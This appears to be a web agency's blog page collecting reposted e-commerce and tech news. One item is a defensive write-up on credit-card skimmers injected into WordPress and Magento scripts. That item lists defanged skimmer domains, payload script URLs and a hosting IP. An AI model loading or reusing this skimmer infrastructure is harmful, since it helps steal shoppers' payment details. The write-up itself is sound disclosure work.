Blog Overall rating: ★★★★★ 5 based on 23 reviews
5 1

BlogSimplio Labs Blog

Once we accept our limits, we go beyond them.
Albert Einstein

Google plans to give slow websites a new badge of shame in Chrome

What's New No Comment

Google is experimenting with a badge of shame for websites that load slowly in Chrome. “In the future, Chrome may identify sites that typically load fast or slow for users with clear badging,” explains a blog post from the Chrome team. “This may take a number of forms and we plan to experiment with different options, to determine which provides the most value to our users.”

A new badge could appear in the future that’s designed to highlight sites that are “authored in a way that makes them slow generally.” Google will look at historical load latencies to figure out which sites are guilty of slow load times and flag them, and the Chrome team is also exploring identifying sites that will load slowly based on device hardware or network connectivity.

Google is experimenting with having a loading screen (splash screen) to warn Chrome users, or a loading progress bar that would appear green if the site is fast and, presumably, red if it’s slow. “We are building out speed badging in close collaboration with other teams exploring labelling the quality of experiences at Google,” explains the Chrome team. “We are being very mindful with our approach to setting the bar for what is considered a good user experience and hope to land on something that is practically achievable by all developers.”

It’s not clear exactly when this new badging system will appear in Chrome, but Google unveiled its plans at the company’s Chrome Dev Summit in San Francisco today. The company has carefully worded its announcement with lots of “may” hedges, so it’s likely Google is looking for immediate feedback from web developers before it progresses.

Google also unveiled its vision for the future of Chrome today, and it appears the company is focusing on WebAssembly, powerful capabilities, and Progress Web Apps (PWAs). Hopefully this will mean even more powerful web apps soon, and ones that feel a lot more like native apps.

Source: The Verge

Magento Warns E-Commerce Sites to Upgrade ASAP to Prevent Attacks

E-Commerce, What's New No Comment

The popular e-commerce platform Magento is urging web administrators to install its latest security update in order to defend against malicious attacks in the wild that could exploit a critical remote code-execution vulnerability.

While the company didn’t specify what kinds of potential attacks that websites should be concerned about (Threatpost reached out for comment on this), Magento is a common target for the Magecart association of threat groups, which compromise websites built on unpatched e-commerce platforms in order to inject card-skimming scripts on checkout pages. The scripts steal unsuspecting customers’ payment card details and other information entered into the fields on the page.

The vulnerability (CVE-2019-8144), which carries a severity ranking of 10 out of 10 on the CVSS v.3 scale, could enable an unauthenticated user to insert a malicious payload into a merchant’s site through Page Builder template methods, and execute it. Page Builder allows websites to design content updates, preview them live and schedule them to be published. The bug specifically exists in the preview function.

The flaw affects Magento 2.3, and was patched in in Magento Commerce 2.3.3 and with the security-only patch 2.3.2-p2, released in October. The company warned that patching will have the side effect of “blocking administrators from viewing previews for products, blocks and dynamic blocks’; but, it said it will re-enable the preview functionality as soon as possible.

“We recommend that all merchants, even those who have already upgraded to 2.3.3 or applied security-only patch 2.3.2-p2, review the security of their Magento site to confirm that it was not potentially compromised before upgrade,” Piotr Kaminski of the Magento security team wrote in a posting on Monday. “Applying this hot fix or upgrading…will help defend your store against potential attacks going forward, but will not address the effects of an earlier attack.”

The same update patches several other critical emote-execution flaws with a CVSS v.3 score of 9 and above, as well as cross-site scripting (CSS) issues.

The warning comes as Magecart activity and infrastructure continues to saturate the web. According to analysis from RiskIQ last month, there are now 573 known command-and-control (C2) domains for the group, with close to 10,000 hosts actively loading those domains. In all, RiskIQ has detected almost 2 million (2,086,529) instances of Magecart’s javaScript binaries, with over 18,000 e-commerce hosts directly breached.

“It is unfortunate that this kind of attack is still succeeding even though a mitigation is quite straightforward,” said Mounir Hahad, head of Juniper Threat Labs at Juniper Networks, via email. “As a last resort, website owners should periodically check the integrity of their script code, which can be as simple as calculating a checksum every few minutes to look for an unexpected change.”

What You Need To Know About Ad Fraud

E-Commerce No Comment

You will often come across advertisements online, data events, or even clicks that turn out to be false and just a method to get money. This practice of creating fraudulent advertising to generate revenue is known as ad fraud or invalid traffic. Now, ad frauds are usually banner ads, video ads or clicks.

what is ad fraudIs Ad Fraud a Problem?

Ad fraud is actually a quite significant problem. It is known to cause damage of almost $20 billion every year. Ad fraud in digital marketing manipulates the traffic and user activity, scamming impressions and conversions. The statistics are changed and data appears distorted so that marketers are left confused and they fail to discover the fraud before it has already happened.

Kinds of Ad Fraud

  • Cookie stuffing

Cookies track a user’s path from affiliates to source sites and every time an affiliate link is clicked, there is an exchange. Now, when the user comes to the source site, it pays for the affiliate. In cookie stuffing, the stats and data of the source site are distorted and the site ends up paying much more than usual.

  • Traffic fraud

Generating traffic onto your site is a way of earning money but this traffic is very easy to imitate. Traffic fraud is imitation and manipulation of online traffic to con analytics into spending more for results based on data that is false.

  • Impression fraud

This kind of ad fraud falsifies the impressions which are an important part of CPM-based operations. These fake impressions are traded in place of the real ones, delivering no actual benefits. Such trading can take down the entire website.

  • Click fraud

In digital marketing, clicks generate revenue. What click fraud does is manipulate the ad activity to increase the number of CPC ad clicks and so you might see a large number of clicks but hardly any positive results.

  • Action fraud

Action Fraud is quite complicated. Actions distort the very elements that move money by imitating user activity and can actually end an entire campaign.

Other types of ad frauds include retargeting fraud, conversion fraud, and affiliate fraud.

How to Detect Ad Fraud?

While ad fraud is difficult to catch, it does not mean that you cannot detect it. If you have a single app and a single campaign it is easier to protect. However, the following indicators can detect ad fraud:

  • Similar install behavior for a few consecutive installs.
  • Many installs from one particular device.
  • A very large number of downloads from one particular source.
  • A very short period of time between a click and an install.

How Can You Stop Ad Fraud?

A few simple points are given below to help you stay alert and prevent ad fraud.

  • Know how your publisher is generating traffic before starting your campaign.
  • Invest in third party solutions that monitor campaigns and check for ad fraud.
  • Make sure that you have clear verification protocols and an immediate algorithm of actions in case of any suspicious activity.

This was all about ad frauds. Thus, adopt the required steps to stay safe.

Credit Skimmers Vulnerability

Developers, E-Commerce, What's New, Wordpress No Comment

We often write about malware that steal payment information from sites built with Magento and other types of e-commerce CMS.

When discussing credit card skimmers like Magecart, it’s sometimes overlooked that WordPress also has a decent share in the ecommerce segment. There are numerous popular plugins that can easily turn a WordPress site into a full-featured online store. In fact, Woocommerce alone has over 5 million installations.

Credit Card Skimmer Injected in WordPress Core

Our friend Salvador Aguilar over at Kinsta recently shared a few samples of malware found in the WordPress core files wp-includes/js/wp-util.min.js and wp-includes/js/admin-bar.min.js.

These Javascript files both contained the following injected code, found at the very top.

Magento WordPress Skimmer atob
Injected malware found in wp-includes/js/wp-util.min.js and wp-includes/js/admin-bar.min.js

This injected code is a typical credit card skimmer, with “e.src=atob” containing the encoded URL of the external script. In this case, it is decoded to “hxxps://zendesk-chart[.]com/top/aco.js”.

Common Skimmer Variants Found on Magento

We regularly find these types of injected scripts on Magento sites. They use variations of atob (base64) obfuscation, along with hundreds of different domains and customised URLs.

For example, on one Magento site we found a nearly identical copy of the skimmer script (referenced above), with only a slight variation. This variant loads the skimmer from hxxps://zendesk-chart[.]com/uk/google.js (instead of /top/aco.js), which works with the checkout form for that particular site.

Domains Used by This Malware Campaign

Zendesk-chart[.]com was created on September 13, 2019, and it is now hosted on 185.254.121.64.

A quick lookup shows that the same server in Russia hosts the following domains:

jquery-web[.]com – Creation Date: 2019-01-21
jquery-stats[.]com – Creation Date: 2019-03-30
tracker-visitors[.]com – Creation Date: 2019-04-19
jquerycodemagento[.]com – Creation Date: 2019-08-11
gooqleadvstat[.]com – Creation Date: 2019-09-13
gooqlemgrteg[.]com – Creation Date: 2019-09-13
zendesk-chart[.]com – Created on 2019-09-13
jquerystatic[.]com – Creation Date: 2019-09-13

All of these domains serve multiple versions of credit card stealers that can be found in the wild  injected into various e-commerce sites.

hxxps://jquerycodemagento[.]com/my/jd.js
hxxps://jquery-stats[.]com/u/redacted.js
hxxp:// jquery-web[.]com/wp/redacted.js
hxxps://tracker-visitors[.]com/my/jun.js
hxxps://gooqlemgrteg[.]com/ajax/jquery.js
hxxps://gooqleadvstat[.]com/ajax/maria.js
hxxps://jquerystatic[.]com/good/hard.js
…etc…

Mitigation Steps

What is evident is that this is definitely not a fully automated mass infection, where hackers have a unified solution (list of vulnerabilities and the payload) that fits all scenarios. Each script has been customized—both name and content—for each specific compromised site.

In this malware campaign, the checkout page URLs are detects for each target. From there, custom code works to collect sensitive credit card information from the victim’s checkout form.

The malware itself is CMS agnostic—it doesn’t matter whether the site is using Magento, WordPress, or any other type of e-commerce CMS. If there is a form that accepts payment details and it can be hacked, nothing prevents the bad actor from installing a skimmer there.

E-commerce website owners should take the security of their websites very seriously, since they are ultimately responsible for any customer data breaches resulting from transactions on their online stores. Extra attention should be paid to the hardening and monitoring of web pages and server resources. Perform regular security scans on your web assets to detect malware and other indicators of compromise.

Protect Your Website ASAP!

It is estimated that about a third of all websites are outdated and seriously vulnerable to hacks. What are the chances that one of those sites could be yours? Don’t wait until it’s too late, get in touch with professionals and start protecting yourself today. Consultation is always FREE.

 

OR CALL NOW
(888) 766-3315

Shopify expands into email marketing

E-Commerce, What's New No Comment

Shopify continues to expand beyond its core e-commerce platform with a new product called Shopify Email.

Shopify’s chief product officer Craig Miller and director of product for marketing technology Michael Perry gave me a quick demo of the product yesterday; Miller argued that they’ve created “the first email product designed for e-commerce.”

That means it’s integrated with a merchant’s store on Shopify, allowing them to easily pull their brand assets into their emails, along with product content and listings. They also can see whether those emails actually lead to customers to add products to their carts/purchase them. And they can create customer segments based on the data in Shopify.

“What we’re really proud of here is, we become the expert for them,” Perry said. “Most people we’ve surveyed don’t understand the value of segmentation, so we’ve taken the liberty of assembling the right list to add value for them.”

Shopify Email is currently available as an early access test for a limited group of merchants, ahead of a broader rollout next year. Miller said it will be free for these initial merchants, with general pricing to be announced later.

Other recent additions to Shopify’s product lineup include hardware for brick-and-mortar stores and digital ad tools.

“The common thread among all of [our new products] is to help brands sell directly to their customers,” Miller said. “There’s been a lot of talk lately about direct-to-consumer, but that’s something we’ve doing for a decade and a half without calling it that.”

Facebook Unveils New Logo

What's New No Comment

On Monday, Facebook announced a new logo that will be used to represent itself as a parent company and to distinguish it from its apps, including Facebook app as well as WhatsApp and Instagram.

The new logo was announced through an official blog post alongside a GIF that alternates between different colors representing the different platforms that Facebook owns.

Below is the new logo as it transitions through Facebook, Instagram, and WhatsApp brand colors (Blue for Facebook, green for WhatsApp and purple, red and orange for Instagram.).

“People should know which companies make the products they use. Our main services include the Facebook app, Messenger, Instagram, WhatsApp, Oculus, Workplace, Portal, and Calibra.
Today, we’re updating our company branding to be clearer that these products come from Facebook. We’re introducing a new corporate logo and further distinguishing the Facebook company from the Facebook app, which will keep its own branding.”

“The new brand system uses custom typography, rounded corners, open tracking and capitalization to create a visual distinction between the company and the app.” “We designed the new company wordmark with clarity and openness in mind.”

In June, the company started adding the words “from Facebook” across all its apps. Although it seems unnecessary, and an alarming number of ‘regular’ users are unaware that Instagram and WhatsApp are owned by Facebook.

Over the coming weeks, Facebook will start using this new branding in its products so you’ll start to see it on things like the login page for Instagram (see photos above).

 

Source: Facebook Newsroom

Rewind Offers Free Holiday Data Backups for E-Commerce Platforms

E-Commerce, What's New No Comment

Rewind, a leading cloud data backup provider for e-commerce and cloud platforms, today announced the launch of Rewind: One-Time, a limited-time, complimentary version of its top-rated data protection software. Helping merchants on Shopify and BigCommerce, Rewind: One-Time can protect and quickly restore a retailer’s online store during the holiday shopping season.

“The holiday season can be an exciting time for merchants, but it can also be quite overwhelming with increased traffic to their stores. We’re excited to welcome the complimentary Rewind: One-Time app to our app store so that merchants can restore their data during the most critical time of the year,” said Fatima Yusuf, Strategic Partnerships Lead, Shopify.

Store uptime is essential for small and medium-sized retailers relying on cloud applications. Rewind has found that online stores have a one in five chance of losing their data at some point and time. Data disasters can happen from malicious acts, third-party integrations, or human error. Available now through December 31, 2019, Rewind: One-Time allows retailers to conduct a free, one-time backup of up to 10,000 products and related data tied to their e-commerce storefront so they can limit any downtime due to data issues.

“Data loss and the resulting downtime can be devastating to an ecommerce business. The Rewind for BigCommerce solution gives BigCommerce sellers the security they need to focus on growing their business — not recovering lost data. We’re pleased to be able to offer Rewind’s excellent integration and world-class customer support to our customers,” said MaryAnn Bekkedahl, SVP of Global Business Development, BigCommerce.

As minutes matter, retailers who take advantage of Rewind: One-Time, will be able to restore their data, to the exact day/time they installed. The one-time backup for BigCommerce includes product, brand, category, option set, and option data, while the one-time Shopify backup includes products, product images, custom collections and smart collections – the backups will be stored indefinitely in the secure Rewind Vault™.

“We want to ensure every BigCommerce and Shopify merchant knows their store data is fully protected this season so they can focus on generating sales, especially on peak days like Black Friday, Small Business Saturday and Cyber Monday,” said Mike Potter, CEO of Rewind. “With account-level data protection from Rewind: One-Time, retailers can ring in holiday sales rather than spend hours trying to recover deleted products or repair broken links and pages.”

Rewind: One-Time users can upgrade to one of the paid plan options at any time during the holiday season or beyond. Paid Rewind subscriptions add the ability for merchants to take advantage of ongoing, comprehensive backups so they can painlessly restore their full store experience (or select products, images, etc.) to any chosen date/time.

Download Rewind: One-Time

Adobe Introduces New Commerce Features For Magento

E-Commerce, What's New No Comment

Adobe is rolling out new capabilities to its enterprise eCommerce platform Magento that are targeted to small to medium-size businesses (SMBs) and mid-market merchants, Adobe said in a press release on Monday (Oct. 22).

Adobe is unveiling these latest features at MagentoLive Europe 2019, being held in Amsterdam Oct. 22-23. The improvements to the commerce platform aim to improve customers’ shopping experience.

“We’re now at an inflection point where companies of all sizes are perpetually challenged by soaring customer expectations to deliver amazing brand experiences. We’re committed to bringing Adobe’s enterprise-grade commerce capabilities to our SMB and mid-market customers to help them grow their business,” Adobe said in the release.

The release of Magento 2.3.3 includes performance and security enhancements to help merchants stay compliant with new regulations. Enhanced features also include integrating with Adobe Stock, an Amazon sales channel for the U.K., cloud infrastructure with Microsoft and an Adobe Sensei-powered product suggestion tool.

“We’re bolstering our multi-cloud capability by making Magento Commerce available on both Microsoft Azure and Amazon Web Services,” the release said.

The “highly anticipated” Adobe Stock integration with Magento offers a searchable interface to find, preview and embed art, such as photos and videos. Adobe Stock has over 130 million images, templates, 3D assets, stock videos and premium collection images.

Adobe acquired Magento’s cloud-based eCommerce platform last year for $1.68 billion. A Shopify competitor, it counts Coca-Cola, Warner Brothers Music, Canon and Nestle as customers.

Commerce Cloud was launched by Adobe in March. This fully managed cloud-based version of the Magento platform is fully integrated with benchmark Adobe tools like analytics, marketing and advertising. Amazon and Google integrations were also added.

On Amazon, merchants can automatically manage their inventory directly from the Magento platform. Users can set pricing rules for the Amazon sales channel, handle multiple brands at a time with access to multiple accounts, and get access to Amazon product data.

Magento also introduced a free native integration with Google Shopping that will let Magento admins manage Google ads from the Magento dashboard, as well as Google Merchant Center accounts.

5 Ways Mobile Apps Can Increase Revenue for Your Business

Business Advice No Comment

The use and benefits of mobile phones cannot be ignored or denied. They undoubtedly form an integral part of our life and existence without them can seem to be daunting. For carrying out many of our day to day tasks, we rely on our mobile phones and mobile apps – be it ordering food, shopping, calling a cab, booking a flight ticket, filling forms and what not!

So don’t you think if you own a business, owning a mobile app can lead your business to a greater heights?

Talking about the various businesses- going digital can make them great money. Many startup owners are often skeptical about getting their own website and their mobile application developed, they often ask why? Well, the answer is quite simple, it will yield business and profit!

  1. Opt for paid apps

As the title clearly suggests, bring forward the paid applications i.e., the users download the app by making a minimal payment and then end up using your services or products.

Do not charge too much as this will drive away your clients. Therefore, decide the fee smartly.

  1. Freemium apps

Freemium apps are undoubtedly one of the best ways to generate revenue from your mobile application. It simply means to introduce applications that are free of cost- but some features are paid. In this way, the users will pay for those additional features as well if needed.

One similar app is- Grammarly. It allows you to freely access some of its features whereas the enhanced ones are paid.

  1. Localization

This feature directly relates to the term “user-friendliness “. The interface of your app should be easy to understand and comprehend by people across the world.

This can be achieved by supporting multiple languages so that communication won’t stop you from generating good revenue and a fancy client base.

  1. Make use of push notifications

We know that today’s market hosts great competition in terms of all the services and products. For a particular service/ product- multiple options, prices, providers are available.

Making use of the push notifications- helps you to drive the potential buyers to your mobile apps through alerts that remind them of the purchase, new products/ services.

  1. Integration of ASO updates

Now, does only building the mobile application does all the miracle? The answer is clearly a No. Updates are another feature that needs to be looked upon.

This means that your app should be flexible enough to accommodate any update done by Google or Bing.  Moreover, it should be platform friendly and must be able to run on all the possible platforms.

So, next time you think of having a start-up, don’t forget to get a mobile application developed. And if you want to generate a fancy revenue from the same, do ponder upon the above points.

 

Google Launches a New Portal for Small Businesses

E-Commerce No Comment

To celebrate International Small Business Day, Google today launched a new website that will suggest its products that seem like the best fit for a specific business.

 

 

The Google for Small Business portal was announced today at the Grow with Google Learning Center in New York City, where the company offers a variety of workshops and classes. During a break in the event, Kim Spalding, Google’s global product director for small business ads, told me that the website “gives everyone a place to start with Google products.”

After all, she said, “small business owners struggle with time” and particularly don’t have time to become experts on digital marketing.

So on the new site, they can enter their company name and website (assuming they have one), then answer a few questions about their business and their goals. Google will then create a customized, prioritized list of actions, which may involve launching ad campaigns, or building up their online presence, or installing Google Analytics.

Spalding suggested that this could be particularly useful for small businesses that are “just getting started,” as well as more established business that are starting to develop a digital strategy.

While Google for Small Business can recommend a wide range of products, Spalding pointed to two “hero tools” that are part of the lineup — Google my Business, which allows business owners to create their own profiles and websites, and is “a complete free product from start to finish,” as well as Smart Campaigns, which Google launched last year to automate the ad-buying process for small businesses.